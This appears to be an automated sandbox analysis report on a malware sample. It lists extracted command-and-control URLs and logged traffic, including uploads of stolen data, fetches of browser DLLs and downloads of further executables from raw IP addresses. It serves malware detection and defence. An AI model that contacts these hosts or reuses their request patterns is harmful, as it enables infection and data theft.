                  Source: Malware configuration extractor URLs: holicisticscrarws.shop
                  Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
                  Source: Malware configuration extractor URLs: plaintediousidowsko.shop
                  Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
                  Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
                  Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
                  Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
                  Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
                  Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
                  Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
                  Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
                  Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
                  Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 26 May 2024 22:27:21 GMT Content-Type: application/octet-stream Content-Length: 325120 Last-Modified: Sun, 26 May 2024 22:20:02 GMT Connection: keep-alive ETag: "6653b592-4f600" Accept-Ranges: bytes
                  Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:27:52 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sun, 26 May 2024 22:23:46 GMT ETag: "20ba00-61962daa50080" Accept-Ranges: bytes Content-Length: 2144768 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
                  Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                  Source: Joe Sandbox View IP Address: 23.145.40.124
                  Source: Joe Sandbox View IP Address: 188.114.97.3
                  Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View ASN Name: AKAMAI-ASUS
                  Source: Joe Sandbox View ASN Name: UninetSAdeCVMX
                  Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12830 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15072 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20562 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5445 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1248 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568201 Host: whispedwoodmoodsksl.shop
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 5897 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 112837Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbtdsjawscshri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gitrvlonrfqrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltjhtqaytuwkyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjjvubikquby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctkjptrcxdnjtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eisoaquivduh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbiuottwvhtdjd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eevetcrfdfleqxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unanbdkiibq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfcngeudnubrryg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                  Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgaaagvpavk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvaotfskdoxlio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipxqunnvdoai.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrjlnlbrgajqsny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopupolbajboxnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imsuruvsrfypw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvpyitsqtsmmqygu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yowyackmlvbjrxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbknieekjatcp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txclniyqjcys.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmtbjhmhexqkn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsnmddlhyunj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eamimphmsadwkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anyyjopgfajdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlfkitushftrjirb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plbuqwbmoldqvnm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjxcjquxocrwkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmlhlokjcexweyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjusdpgryce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajfprnyfteagngdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: dbfhns.in
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqimnaeauxblwda.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: dbfhns.in
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FCC60 PR_Recv,13_2_6C9FCC60
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                  Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
